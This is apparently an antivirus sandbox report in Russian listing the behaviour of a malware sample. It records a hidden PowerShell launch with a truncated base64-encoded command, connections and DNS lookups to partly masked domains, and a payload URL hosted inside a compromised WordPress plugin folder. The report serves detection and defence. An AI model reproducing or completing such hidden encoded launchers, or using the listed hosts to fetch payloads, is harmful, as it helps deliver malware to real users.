Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABTAGgAagBtAHYAbAB1AGYAYQBsAHEAbQB1AD0AJwBCAHQAcQB3AHAAegBkAG4AbAAnADsAJABZAHIAZgBpAGMAbgBmAGEAZABzACAAPQAgACcAMwA1ADkAJwA7ACQAUwBlAHgAaAB2AGcAbgBsAGsAcQBmAGQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 280
- %TEMP%\1021026.cvr
- 'ja###on71.com':443
- 'fe########ternacionaldehistoria.com':80
- 'fe########ternacionaldehistoria.com':443
- 'j-#####voutfitters.com':443
- 'sp###.technode.com':443
- 'vo###oda.com':443
- http://fe########ternacionaldehistoria.com/wp-content/plugins/really-simple-ssl/testssl/cdn/q5j350/
- 'ja###on71.com':443
- 'fe########ternacionaldehistoria.com':443
- 'j-#####voutfitters.com':443
- 'sp###.technode.com':443
- 'vo###oda.com':443
- DNS ASK ja###on71.com
- DNS ASK fe########ternacionaldehistoria.com
- DNS ASK j-#####voutfitters.com
- DNS ASK sp###.technode.com
- DNS ASK vo###oda.com